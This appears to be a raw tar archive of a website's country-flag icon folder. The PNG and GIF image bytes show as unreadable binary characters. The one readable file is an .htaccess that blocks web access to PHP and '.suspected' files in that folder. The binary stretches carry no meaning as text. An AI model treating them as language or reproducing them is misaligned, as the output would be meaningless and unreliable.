���!��h���?H"`��<MD��,IEND�B`�images/flags/do.png000060400000000774152434416630010231 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�\���c����߿����|�'(����� ��T7���?�����������Y�DSS������ �L�ݴ	 �@�J_������? ��,����{��������P5��,����
0¤(�?L!5L6b�
�rv�YD$�rТD�W_�0����L������A�J�:�k ƿ�222���pF&��>�]�?m���ȼ߿w���Szh��?��?q�}�	�PK��<D?���/�ۀ��U��t
(l��p �C�
�20��f��
H@�5���$)�
r���L�L���b\A�
��@$0���*jDBH��?p��+� 	CIJw�OI;WIEND�B`�images/flags/pr.png000060400000001054152434416630010240 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd`����@���_���0b�1���� �X�U�a8��t��������������?��o 2N�[@��k�=���󪰚�W��������@�?01������u ��@6�����p�Xn���,�X����?��13�ca �����1FF0����������>���PǀI6�c+VP��	���n����0���ڍ���7�~�a���P�_ �7����a�@n���W���ȯ4��G�uv�����e���;z ����]��x�>P����w�Y��L�B�\FF�g׮�?�0ݩ�����_�$��?�`�H-XP÷o���{��vS������u�j�c@����2������j�'6_[����7���-���-+1U��IEND�B`�images/flags/gq.png000060400000001031152434416630010221 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b��A��10������da &�~Ǘo&����������߿�����������_0���￿7��@,@]��|><������HI�4�����Y^Y�o���#����?�A������H��������-@1�a���ã��?~��0B��˗']8����&���� ��~�a�����O����h��`�
0�� �?������D3���/8X�٘8>}�����(�L�|����
�b����b���0ā���~}�@,L��~����������h�?���'Pϟ�@��:@,_��>��"&�OX����/H5����p|�,��210û��71���`���C&�5a�IEND�B`�images/flags/jp.png000060400000000644152434416630010234 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<6IDATx�b���+����Df�����(���$��������SH�ŋ�S��ط��#���of�������h	@���^���…������Ç�?}�?9��B�b��$��ի������/(Z����pK���@L����G���`�˗���YT@,@�g���V
�h�,))���* &��@�����������H������ ���:�sq�ߵ����L��@�@1�}����.
e@����?B��޽@ ޽{�H� �&�l�争=IEND�B`�images/flags/cc.png000060400000001161152434416630010203 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bd�ef��?�I�_0����?��lsA����/o�Z.���߿���������W��{���8ξc�T6 �@|d�&�a���ny5l�+Ǐ?��}�����?��������_μa��@L"�9~�)�7b����oV�_����j�l���_�������7L@�1�W��1����
R��g����7��l�m"�2���7�^�"1�������������	�}����%���������	��	,��~���������ﯿש�����I'�������v���_�� ��������0������~'���6��ٯ��������E�A�@,@
��
���ϗ��9~�����/������_��`��@,`�H�<P'�/��p������߿�߲�'��9����`��HQA�a)@���9�	`̫)����IEND�B`�images/flags/bb.png000060400000001111152434416630010174 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd`nd������s�1������u>����P�z�'����?L�2_���� ���f�?L,�c�������/o�0 �X�&����߿���b������������������ï����e%��6�h��?@3��������n�����~����ϯ?~���@, w�U��D�������������/�� 
 �_���6����oC�_?����/ �ׯ�`K��j ��?�������_�mp������;	��6� ���@�@
lï�̿x~1}�
���/�x��@J��;�߿@~��
�
b�����������4� �`���
t�OV������a`���GI��Aa�� ��X�	Do7/���������0�ca���d`������ �f�g{5̽IEND�B`�images/flags/ua.png000060400000000676152434416630010235 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<PIDATx�bdh����1�� ��?(�#��� �rr1Pz�(*�
j�d�!�7n�G�3K��,TCœ~K��G�00�T?�����?��߿����!�~�!�����@�l�T�d6H������+�ks�� �X�.�����l$�P�*��� rJ�S��ߟ w����H�����ʖ�bc�:@�20����?�/�W���dbRz�@�C�,HTE(�����
@ 
� P��6�� � �@��uJ�DA:�#B����?�b�z���@I8�`@pA�H�n��GIEND�B`�images/flags/be.png000060400000000701152434416630010203 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<SIDATx�bd@�3�1��c�'����?q�@,@���j�
��������?��x�����@�M��l�'O����~30����7��������~U3��m ���J�Ф�@տ������~��h`��� �@@�!����4Hß?�����B�?�j��?�6���_��j��0�N ���~�Y���
�Í���8	�[(������P�_�Kb�III�7�22}�Le��à����N F���}���w��0q0�{��B$���p�� ��Ze���IEND�B`�images/flags/hk.gif000060400000000525152434416630010204 0ustar00GIF89a��4�F1�(�*�#	�ſ�"����)�"	�|�&
�]J�'�z�1�2��%�!�9!�$
�hV�$��cP����u��M9����v��������#���º�9"�YF�A+�&
�zk�,�td�� ��!�&�����`M�����P<�G1�H3�8!�)!�,r�oH,y@o�&&��.	����J����y-LﲲS�@�H�KW��i��yN#vR!
0QKjK)+%8756R�=(9	�wL.	h�JVK�RBG�CA;images/flags/ku.gif000060400000000445152434416630010222 0ustar00GIF89a�������<�����7��'��!��H�.�����{����Q�����=����m���B�����0��o��?���c����O������3�!�,B��pH,���'iT4@��hJ%,����F �B��-�$	������	�I�<��	a�$�����A;images/flags/he.gif000060400000001524152434416630010176 0ustar00GIF89a�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������좻젻츸���������뷷���뙶떴ꔲ鮮���鏯荭苬芫艪燨焧梢���扤‣�}��{�䜜�y�䛛����v��v�䁛�u��s��q�㐔�o�┓�m��j��g��g��i��d��f��f��c��e��c��a��]��_��]��Z��X����V��T��T��R��Q��P��M��O�M~�K}�L}�J|�I{�Fy�Dw�as�Au�>s�<r�@q�:q�8o�8m�eju5m�<k�3k�1j�/h�4g�,f�*e�(c�^^^%a�$`�"_� ^�\�[�Z�Y�W�V�W�T�U�S�R�
S�R�Q�+N�Q�Q�
P�N�
N�O�
M�	M�N�M�L�L�L�K�K�J�I�I�H�I�J�H�H�H�H�H�G�G�F�F�F�E�E�%B}F�F�E�D�D�D�C�C�A�B�B�B�@�@�>�8�	9�5�1�0{-~!��,1H��m*\Ȱ�C��A��p�A�-���F�?�谤ɒ"
;images/flags/lt.png000060400000000774152434416630010246 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�}�������D��
$�l bb �j&�f�����2�����?����P��@ÿߟ.� &F��g� 
 ��B���������Uh.@�\�� ����_@3�B����7�`�����0��be�u�@���a(s���˗?������ �/����_ 6����?�� �X~0�����i)I��i@h��� �X����ϟ���B`~��h����@T@,k[t������hֿ?e`��/P�N�?�.2���?_��J����?�0.��?Y8�z00�/���fKJ���� � �$������?��`` ���#��r�āg%"wC��ݙIEND�B`�images/flags/uk.gif000060400000000074152434416630010220 0ustar00GIF89a�3f��!�,������<�ڋ�޼��V;images/flags/eg.png000060400000000721152434416630010212 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<cIDATx�b|��
���p�I �an��l���%�#��e�aw��.;R��!�0���9O���2����)P�߿@Q� ��7H�/ �׿_���L��@����ԔIS�ATj<P�߿��f��ƴ����_@����,de۾ ���������0������~?a��`�����>}�@L�B��]~~����g-������j0�����������?��Ĩ��_XX���k������R_�MZ��]$�����mmmr}ZZڽ{�~��/0�0@$�4�EEE��ŋ
V�����@)�(�0[�b�_* �@���NcH���IEND�B`�images/flags/au.png000060400000001241152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<3IDATx�b<^�|�C�rǻ��X����V*���D�s�����g�����10�1�KM��y<������"���������[M-���ܣ��1��		������������=����F;!��� ����鐎��>���_aQY.3�߲�we�~������p�k���t	an�o��!$�AXx�?��<�/X�	�1��~�q�S��-L����w��+���"��1�,�
����������������%"��������������1���)-D.����	����������������WK+���	�Ѿ�	p����/�^�6�����c�����?�������ϟz����ۿ�����ׯ?@�H�I��i������?`���|�V?����?P@�5M���y䮾��d%�~�������͵��~���f�5�������?�:��d��c��M���`
��w��IEND�B`�images/flags/ls.png000060400000001164152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b|��-������?�@��}r�8@,@�/�N������գ3��^������B��ԣO<��p�@�4H�X�8<��o²���LH�@����Q�.={�EF���� �X�v�:���{�����ᕬ�'##\��'�z������bP�@,�>���������ϯ~���fV���~�m�v���_@�?���_�[�=�@1�&:]������'<^������O��������������䇗w�	Ji000>����F�j��?|����׷����b~��o `��1����'@(@����]��������������������������ۯ��>����?����z���,o~��
�Ÿ@
�� �@^�6�����r���g�o��~���ϟ������~1KϮ�\`x�	տ�1�Me�c`z��<�&��I>�mP�!j&@IEND�B`�images/flags/ar.png000060400000000772152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�<��������a
����Ͽ?�E@�󏍉 �X>�aHU�����?�@ÿ���g����/����\�=� �X~�a����� ��@@K�����@\([�����?�b��}�)&��h��6 	`>�	$YD���:�?a6�b�Z �}��/���2q{��p���f���.TB���������?2��@� �f��`�c��N�9���3��@�\��O����� 0��r�����+T��l,����@,Y��J�^~�<@��C�4��A'���yD �X���cd`e��_`Ȃt2@�t78N@~� ���~}��?@��H-(����l�p�m�A`IEND�B`�images/flags/om.png000060400000000736152434416630010240 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<pIDATx�b�π�d`�
P�Ço��qYZ>oh���(��?�BϞ= ���?����{�ףGX�A##�?�	(�,&�a�66%���R
@'#�*ee?�f����~������/ �׿_���`�]^�������?���������7ï_@���CH�����$���V
4��o���~3���J����z ��@���_��J~����_�� ���l�[����mg P(�r7P'PB��r뿿��e��@��JJ���W���/P��� {�*���T���@1�e� �L&�20��������i���yx9�IEND�B`�images/flags/belg.gif000060400000000122152434416630010504 0ustar00GIF89a��$��!�,#���}�RsOD9A�7�z��`���F�S��+�kS;images/flags/bw.png000060400000000673152434416630010235 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<MIDATx�bT=������߯@�H�������̀�0,�V@@��$�U��0JN�.�%)s[����҉z�� ��y�X_�0��gx�������V$�U���@	�b���#///�I@+ $V���x��}�b�(++{��� �
�����Q@R^^����럿@>\DE9��H�߿ ſ~���R�l6��b�b|��-???~�Cd�~�u�@���iQgx��a!AHp�c��dX�G �X@���I�
��0e����F�_� 0~��G-@12l���)R�0@��Z���gu}a^�eNIEND�B`�images/flags/vi.gif000060400000000446152434416630010222 0ustar00GIF89a��b
�����������������9�f�n�g�"��K�\
���1�}
�'���x
�������
������!�,C@�pH,�	�qIb��LJ:tD,��s�0+�h�\���x�QI��b$�P�$@hPCoC�ooA;images/flags/hy.gif000060400000000106152434416630010215 0ustar00GIF89a�����!�,�������ڋ��6���H��);images/flags/ai.png000060400000001203152434416630010204 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�1�]h�������P9J+
��7��������������1���,��
G����0X��aD�����������������\��e��ml��z���_�#n^���)��ry�O��X���Ͽg��2120| �^6�R=m��/]���"#���c��jgh�S�����gުk?1���+����� ?
���������

�����O����Mw�����ԕ'��X�~;��ﯿ��JX���+��k�?P�w�bd�[��j��Ï����D����������_#yvF���?|�!� ��~����/������8����q����}g�q��@~�o`�1%�B�_���u���￟��h��_Y�~ �
@��y��m�8	�A��2��@9�?@�#�P'RD~�#�ܿ@7���$@��YH�@{IEND�B`�images/flags/an.png000060400000000750152434416630010217 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<zIDATx�b���#����A���
Dϟ�H$@,@	>>> ������������ϟ����R���3�b�*��2>���7!FF�?��j ������~!k;�@1�yvvN���������ut.���}}��������
����	�
h�@��n��Ͽ��ӵ5�~��__o����_���D�?tҟ����_�
���|�T��$����mǓ��@��z��e`�@�o߾��燺���>z������s�@���<��:�j�P��
�!�W
�<YY�߿��@(� ��HëW�����֭����۷�11���?�@��iN�Hc�IEND�B`�images/flags/bs.gif000060400000000470152434416630010205 0ustar00GIF89a�(���tYUX��

�;=��UU�WW�QT�##�kmʉ��dVe���n_b{mlrdm���jm��]]�x{�rcc�sknbsUX�aR`�
����\^��
����������!�(,U@�pH,O�@B�19�O�i��(�D�V����N%�c\6��G�6�dk�NOu}'%d}n
&���TF�EA;images/flags/fa.gif000060400000000506152434416630010167 0ustar00GIF89a�s…���r��t†�bb����\\�cc�mmr…������ddtÆs†���nn�������CC������dd���uÇ�DDsň���rň�optÇ�eetƊ�wx����cc�aa���������������3�3!�,c@�pH,��d�	��i0�p
����B�(tϛ�j͖@B�{N_=��.�J&~+&���$##�#$��)�����*�����(�����A;images/flags/us.png000060400000001141152434416630010243 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bLN?���1�����?��%���o^��P �rn@�+0Dc0P,J�e�
>�{�2}R��j�L��{D�`���bj���X~���@�����A���e�fx����G�/��}c��q�@m�4h�}ݯ�_�ZU�|���~����>}���ûw�޼y�o�/�N�<@,����wof���k˟�-�W~��z�+n
�`�/_������/Τ�?W�Cr���m�~~��Ѭ���ׯ��>~���+��W�^�|������ݲe@�d��?[���/������i�������'���7�� �G��JJ�-�t����΀��!���0e��b�^0��#�i�/_2|�t1����_���@K��� �[�.�˫}fe���q�Q��?��b`x��?�I
���U��?(?A"�?>30|��`.D ��[��0�+IEND�B`�images/flags/qa.png000060400000000702152434416630010217 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<TIDATx�b����?(���/IB����~10���� ��ظ������C�W������߿������&���]�|-@�@���^�T����" ����~I!i��bBV��߿��F�Z�
���`��_ �� �X�h[\U2��/�
P����A^c &���
�-�?��U�LP�����_Rr�/��6���7H@1����?��l�/��j�o`�5�I����q:�? ��H%@1~|����� ���ep������	'��޽�@yY���@�k}[�T^�YIEND�B`�images/flags/er.png000060400000001215152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b<��0G�a��W9�_0����������;3�3�?7�������_�?��ѿ߿��ɿ~���i�&�b��������3%�?ʗ�ڱ����Y�?{5~�c����?����߲ܲ@K�d��?ր?�Y���������?ړ���sE��I��'d?�����1��G�����'����t����;�9������!��0��1����W�����������������J�G�����d��X���7[�џ��a���
��_��3s�0?/l�^ǎa[=@1�����<�����������2�6�5�
��%��dÿ���ͦ��SL��j]T7;-j��C�+㏟�~����B1�������+�K4��������������������q#��51�y-~p0�F�X��@P��8P�IEND�B`�images/flags/la.png000060400000001063152434416630010213 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�ˀ����
��8�a "[���36���:����u$������{6�k��z����?X��������B����߿������￿�џ��%��61��"p#���������YF�������������������Ͽ�~�c����ǟ�L���2��\@T�(�������A�H/@1������
���a��b��|��̿�����`�@ �����ï���cx�� �|�����??��������@��~��
���TN{��'�ɫ������u�C@@���)����տ~@����L�A�`��r�j�e�A�G�@�@��h1ÿ������0p���@���@��1"�"�)���Bz�f�?IEND�B`�images/flags/vc.png000060400000001101152434416630010220 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd`8����߻�� D�? �����Puu�"����Iղ����/P��f�?L���'"���~���i�&�j���~����������o8�����~��-�#� ���V����ϟ�`���������@���������\�5������ϟ��x�k���F"�Y�x��_ᗉ��_@���5���@տ�g���ʻ�'^�2��+��؋_g�fd��t0tbH�o����Z���~����������|�~��
q�I��7�o�йf��LD~m���ï���~�R��A6(X���$����/o����TCD������`��a ��{$$؀>ab�d`�e`����#�o�,3�e���0��@�[�q�(��h!P��h��E���cO{Z�έ�
IEND�B`�images/flags/km.png000060400000001101152434416630010217 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�_�0C������g@@.D€��e�{�j7%-�@�����&p���M�����g>J~Ӓ�b�g`��FF 
���@K���Ȣ��/?�4���+��Z�W� 1�Y�����\�]���O�Q�͞������������������������N��M�G��K//zz�H�Y�`������Xٿ�=@P
F�F�>���_N^��aA��_�������������EV���S�̠�������y��´˿�o����o�_���~1�LX���\@P*��˾��Xv[^�� �r���99I? �_�q���asG����������_ ���?0����_�_6O F�Pq�'k��1|�����`tI0�?$*�Z�4�K.��IEND�B`�images/flags/by.png000060400000001002152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�L�A
����{�$m�����YJ֚��a�&�N�	����0t�g!fK��q(�|q����n�@2�$�E��O�0|�Ȱk��| �j�P�H������(+��� �X������P
��Q
R����o��b���5�ƍ��`�?9	A?!�@�� *��wRT��yPmp�@�?�6���׭�?i2�0��O	F'�?������H���߯_�����߿�������Q�s�� ���m��nj)��}f�
$?A��OL�>2��,�>����� �X���2|��TS"�'���_�a �����@譿@��~0���/�I�?x|ڴʔ��a@0���  �o7u�[TbeIEND�B`�images/flags/ru.gif000060400000000106152434416630010223 0ustar00GIF89a������!�,�������ڋ��6���H��);images/flags/fk.png000060400000001210152434416630010211 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b�_X��C�rɛ�L~10%?�hT��c%e<��'�??~�@�
 1�;3���A�����
������������������������1�������������Q����1�<5�������e�������;��1�H|z��"�����'۞��?��_~��
 1��J^I
��3�����
7M+����������������������m׶E"A��~���ן��.�U�f�����?�Y����__9��$�j ����~L~~���������|���?�a���'ן�������o��A6���C�������~�����7/����{�)�aS����H���?�;0����o���Ͽ�����>�gx�ׯ�m=+� ������_R�h<P'�U �@����6�����F�����_��bd`���/T��`qa��`��?�(_�
IEND�B`�images/flags/uz.png000060400000001003152434416630010247 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd`H\��LCC����…���Yw��+5_�" �����0���ӧi;w�=w�ſ���M�������3������ᅴ6U������޼������'a!�Ǐ�
s޽����~����P��,?��bIe��p����/D��=���߿��y���(��߿��������[��k�b���'//+О���3�!.���x���b�����r�,#����?�^�6����@130$e5����ߟ?�n��"@t�o� $���r�m �������{V�ן_�ϟ߿���
�����s�����H�J����1� {��������_�'�����
!!�
0:<o^��IEND�B`�images/flags/ag.png000060400000001117152434416630010206 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�d 
�v����o��#�_ο������aߟ��~�����߿���[a�&�1�.���������g���
����2!�1H�[z���������1����?�����������9-���<0����������J��*�������w���?�3�
.���?��?�{�L�����g��Q�b�i����?�V��v.��&�?��25�����<�_�W0����bz�?���~��-)� %�(%�D2b2��~��4y�}��o�����ϟ���������#�o��#"���%K~��������2��T@L@t�?��������u?.^���q�����@���!�I��䇿Lb⌿�u�y=w�T[�&��S��h����(�� ƫ��i��.6��� ��"���iIEND�B`�images/flags/ht.png000060400000000747152434416630010242 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<yIDATx�bdU?����������ï ��Ï? H���I�$�A!�}`䄂p�&�	Tݫ�=W�R�` ǎ�?�̱�bj����՛_@�!rP��~C��~�1�EY��Ъ�����
S��d$���j�5��?@ 9��H�!�Y���o�����D9�i��Z�����~ɿ@�o.���������������L��
�`6���]���
�{@�?�I�� �~���h)˿?���0��5��7T؋�� ����%AF����7#D3PH���	�@��cp��E�?H��
BD  �
��ʐ!�qIEND�B`�images/flags/sm.png000060400000000766152434416630010247 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���?�?�����0�!�?`I�b���)���?#�����3�G��| ��`�ƿ���U322- L���~���?�nd
� ��w�����ۋ��~|r~N�\d=��0#C��>o�����D��פ�O�"��͇�x����?�K�1-h�@L��������tc
��<_����z��l� ������@����@��ɯ9{�����2���ߘ������� �@��e�2���_5-�k��������߿�����/�ba��&n�%7�0(�Fͻ��ß��pc����Ȑ��h�!(.����	`�DO���a�IEND�B`�images/flags/ca.gif000060400000000113152434416630010156 0ustar00GIF89a���S��!�,��y��߂��N�����G��Yɡ_;images/flags/io.png000060400000001222152434416630010223 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<$IDATx�b�^ۻ�\�g��1�����l�a���700�a`���As�0�@1�[G���I�����%$���
����
��&C��1��������	��������������>�����{U��e�;UM.�w�~�S_(���[gIYi�����t;?�����1��BP������"����
1
��̷����R=�<��.�Ϻ.����I�Ýw��4L���U���g�#������,������\4���_��r�[fέ F���>��?�\��?���L��[8)�~�Q�<I&g���1�go2MJ ��� ���	
��� 
���+,�v�$�^�(:7|�e��#R��O�~��7�T��\�U"1�lڿ���<{ޕu˻1�]e�vo7�����	������
��~�/w����RH�H ����F@@�jS\���IEND�B`�images/flags/ps.png000060400000000730152434416630010241 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<jIDATx�b��@ �o��w20\�����L@��߿a$�شi@�5�0��z�t�߿�����7P�o8��@d���H����u��W�o�	���FFƇ�?��o�A�)����L����`j*� �������?~��h�����t�@,�?�����_����������I`K�	�$���~�d���!ϯ�^XU��t�?�������ݪ�'x�����ז�������~��������_e~��-G��=۟5��Y%����H�?�
`|����P0�������_�?���P� ���� 1����$@��T1p�4qIEND�B`�images/flags/england.png000060400000000760152434416630011232 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���#����߷/礥�10ܾ��P����?T'�zQѿ?�����#�gϞD\5H�߿�����߿@����@,h�!$P��_��J��;�@�<HI�������<�������߯_��~=cPP$����Ѕ�\�by�z���үǏ�����o�K���_�ޭY����_�

����ޞ�ȈM^�߿�@�m��u+P)������YED�� Ʒo�����]��\]����%�,��w�� �?���9���eD�1C	 �@�!��l22@'121M��Ae��իW�q��ݻC[��b`p�t�AH�����D�J'PIEND�B`�images/flags/nc.png000060400000001117152434416630010217 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�>��1�����@���B�����!C
���O.��3~�.����Ͽ�����F��g� ����e��������'���|�0����������l@����Ҧ`YEa�3��?�-�}��߶�Q���ܻwR����� ���&1����|�������((�����1�2�������������A�P�6�0��7,<�ԃ�lME�������"#�VJ��QB���]��@,��`8���Ot̯߿�v�NL��{��h�?`@$#���l�{��?�{�'��ٱ�P�ϟ�RR~7��[�h�?~�����eѿgO1Ђ������������B\p���!�����x����h�֛Z��|�����Lg_��*��!� ���z���H �̀�AǏ��$IEND�B`�images/flags/gp.png000060400000000750152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<zIDATx�b�}��
��c������� ��1�P�Q�V8G����Uګ�B���cƪ�p"R٤)����1��O1~��K���K ���##����??��&��>���4�7�t ���7�����QB�Ô
���C�_a�K�����!������H����(�@L_-X��g�c��b��2����A�������������� �:�f���@,L_�����=�� ��t�r�1�����7㟿� �7�
*�p4��Ҍ��B�#�G���� ��=4�����(��d�|� ���%J��:���`�7YO�E��IEND�B`�images/flags/pt.png000060400000001052152434416630010240 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�d`���X�n�2�"�ba��P�Z
R���e�ˠ�����?���a�����?�a�M����	�����O���	����'��׿ٖ������_�������/�jFYY�
�6���M��ö�����������X�o��߿��	访���������[��e7��uZ�����_�����h:@11�b���￿Y~���'�	��L���~�f)Bh��h@�5��d�9��_���"�r�o�����$F������_�GX�'�'o���|��W�j`(��@ �������ov�_�����X5D��`X�� �X�1���G�_��@�C�A�7P/�j�� �/�@���~0��L�?c�c0��Fv�|��IEND�B`�images/flags/.htaccess000044400000000424152434416630010711 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/flags/tf.png000060400000001017152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�,g���:���b13	 ��!����/����@,@��~��@
��322�t2����O��߿?@���?���L�@ 
���x�j�������|����_����߿�JK������0�M����0�ᘷ�4le�s 
{�S+�X~�����߿�@��b<Pï��m��t�I@�d�����@�z~�Ku��� ��N���M-�4h��4���e����\6;�h��o�毺���@5����?HP5��N2��y��ho)�6��@-�
R�b0�� wIA~��h������37��@ �f�	s�Y������_����~#�Sc�SG�<� ��1����8��l���\�FgIEND�B`�images/flags/gw.png000060400000001004152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b��d``b�����?��"��?�$\]
$������������L�2��m����'O����30����_`�Qh@������_F��߿��K�AV
!~5��-����������I)�
�@�l����߿������Ϛ���q������@��Ͽ������d�S�� �@2����'�/�������ׯ?�������_a��J|���c ���~����0��������T����@ 
�@�@�2��T�j��? S���D_���II��?��s���	���/�����q
@�_�G��<��70�0@���A� �a�q�%#�aIEND�B`�images/flags/sj.png000060400000001000152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b|�r��sE]��D�3�?�`A�	@,@Q��j �����)FFF���0����~��
"��߿�n�@,`���{�H�|���σ@�������׿_�����,+� ���U��@�����_ � �@=�@$���@W��߿@g@�������c@e�>#s�d����v�@m@��$����H	���9
@�������ɂg�q��q&&�����=ff�ܬ?��l��줷v�~�|���o�7~�aQV�z�@���d@� g����'D�/� H'���?��f ��?�$A.���,�_P�3���������@�WaQ��މ�̮	���1$�`$�Z��l��IEND�B`�images/flags/mz.png000060400000001110152434416630010236 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b��g(c`�a`������DF�`$@��`q�"�UĈ��p��%����lW�I���[����W�000(�����|˿���*��(������߯_�ܲ@���|��v�
�/d�����J����caa�.u �X�10������?�uݗ~������?@�~���H� 귬��]��	�I7ƺ�b��\���|}����/���}z���K z��-�9���[�v�~{������Yg�a���~�� ��d���
� �200We��p���Ͽ�ڏ���c���@�_ �������4Û?��3x�f`���? �
#������edWQyv �X���$��!N��o�@r��$(�~30�!��_����a Ư��z��1�����@�~��P�L`c0�fI�@��3IEND�B`�images/flags/th.png000060400000000704152434416630010233 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<VIDATx�b�π�P�X@�� �a�����@o�H�����RWZ�"{�<���"�b��d��3�c����>} FG׍9�:����h����������A������Ͽ�B�e�[�e��3��"�}��$�Ͽ߿�ѯ_���_8)/��� ��~�q'ȑ@�������z~@�D(,���߿����h/�l���f�I����7����/;8��vЌ`6���II�S�����ϟ������8���۷o��;;SI	č�2���F�Jmٻ ���F$�8���b�ͪIEND�B`�images/flags/gy.png000060400000001205152434416630010234 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b���e�Ӻ�r����1��$�F��1��D! $*��޹��������������������������1�,���ŋ��AAUr.P���Ӟ�������������1��<<�������$�	�I[AC�������

�����/PCYãG@�������Q��EU��������?���0λ��ɗ7��WXCQ��~�����/~�߅ſ����$������D�@�=��/�{�~�������/��j���K�~��eލ�_^1a1����������	�O{�>8��(��a��ٶ��������#"����ϟ��o��[�%'ē����ߚ�N���ꯟ_~3��������X �+/�o��W�������������y>�?�@�������/0X�Q����I�� ��/Ԙ�&y�6!j
IEND�B`�images/flags/ck.png000060400000001112152434416630010207 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bܝ^����K/:��aa�W�G+�坟�H��m2?~!#�b47o\��]@��k�~��#&%"³�޷3��3�r�����߿ �-�/1������������4����
��������eH^���i���?MU��B������
�K�]�Q�
T���ʩɿ~��j��t@1=0p��ƹ�	�S�g�����Vx�����_��z'N��~����OT�<����n߱�g^_~�n��ݏ�:ue����*Z?3���= ۀ^������IJ��;e�@��,��⏞���;�[̤�A�}���_��mmm�	謿A�2��H	t̞%y�@���R�^���B�]��2�H__
��/e:P@�5��Y
1��?	���@��1[AF���@
��`��?`�_l �v�Hn� IEND�B`�images/flags/zw.png000060400000001076152434416630010263 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���f�&���`��f�Bb�1���_�9�gno���������� �����`�ߟ?��@�_�~�be�����tW��30����7�F�e?}�@,��;���q���:���&�_��������?@Ư~��
"Y�_��@,�&U1�+�0띧���wU����7H��_���
d���{@1�=����y������/�������ϟ���P
D+**=z �XX�L�^:R}����{U��d�`~������~s����@,�������EQ��_X�~�������1���2�����
@�<�����m;��'���������o����2�����9{{��6,ȁ�"�����_x��o՚���Cy)y�8�/�H��ld6$�y�]X����dIEND�B`�images/flags/sd.png000060400000000754152434416630010233 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<~IDATx�L�A
�����A�6I��`);�]LA�Q)\��܀abBWξ�L�1�����?��a����߿����F~ٴ	 �X�0��Pc��e�k���� =@�H������(+��� �@����D�uI �C3�����G�p��������t�~�y�2�`�c������?�/��b�������c��5[+��؀���@ 
